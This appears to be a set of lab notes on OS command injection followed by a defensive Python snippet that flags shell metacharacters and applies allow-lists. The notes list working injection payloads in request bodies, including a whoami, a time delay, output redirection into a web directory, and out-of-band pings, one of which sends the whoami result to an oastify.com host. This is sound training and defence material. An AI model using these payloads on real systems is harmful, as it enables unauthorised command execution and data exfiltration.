OS command injection, simple case

productId=3&storeId=2+|+whoami

Blind OS command injection with time delays

csrf=6MTK8ezPHaRvkb0SrUGDYuzvGsMIPlBT&name=1&email=|sleep+10|&subject=1&message=1

Blind OS command injection with output redirection

csrf=0RQvmPNElav5S2TjfXdN8AOIlFL7Rdb9&name=1&email=|whoami>>/var/www/images/output.txt|&subject=1&message=1

Blind OS command injection with out-of-band interaction

csrf=u3WKiY9ANqJGps5Sx4qbt4N2w1bHjQ24&name=1&email=|ping+m8vxmbxifw9lbikzy0wd52nmyd44sugj.oastify.com|&subject=1&message=1

Blind OS command injection with out-of-band data exfiltration

csrf=zFQDrjDaYRKIi4e25nqDp5fGJ7bFESpo&name=1&email=|ping+`whoami`.mndx1bciuwolqizzd0bdk22mddj47vvk.oastify.com|&subject=1&message=1
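
A defender's view of the request bodies above, as an added example that is not part of the original notes: a Python check that parses each body, flags parameters carrying shell metacharacters (for logging or alerting), and applies an allow-list before a value reaches any command. The allow-list patterns and the function names are assumptions, not the lab application's code.

```python
import re
from urllib.parse import parse_qsl

# Characters that let a value escape into shell syntax: pipe, ampersand,
# semicolon, backtick, redirection, newline, and the $( substitution opener.
SHELL_META = re.compile(r"[|&;`<>\r\n]|\$\(")

# Hypothetical allow-lists for the two fields the payloads above target.
STORE_ID = re.compile(r"[0-9]{1,6}")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}")


def flag_parameters(body):
    """Map each parameter of a URL-encoded body to the metacharacters in it."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = sorted(set(SHELL_META.findall(value)))
        if hits:
            findings[name] = hits
    return findings


def is_allowed(name, value):
    """Server-side allow-list check; unknown fields are not judged here."""
    rules = {"storeId": STORE_ID, "email": EMAIL}
    rule = rules.get(name)
    return True if rule is None else rule.fullmatch(value) is not None


# Request bodies copied from this page, plus one constructed benign body.
SAMPLES = [
    "productId=3&storeId=2+|+whoami",
    "csrf=6MTK8ezPHaRvkb0SrUGDYuzvGsMIPlBT&name=1&email=|sleep+10|&subject=1&message=1",
    "csrf=0RQvmPNElav5S2TjfXdN8AOIlFL7Rdb9&name=1&email=|whoami>>/var/www/images/output.txt|&subject=1&message=1",
    "name=1&email=user%40example.com&subject=1&message=1",  # constructed
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(flag_parameters(body) or "clean", "<-", body[:60])
```

Flagging is for detection only; the allow-list, together with passing values as arguments rather than through a shell, is what removes the injection point.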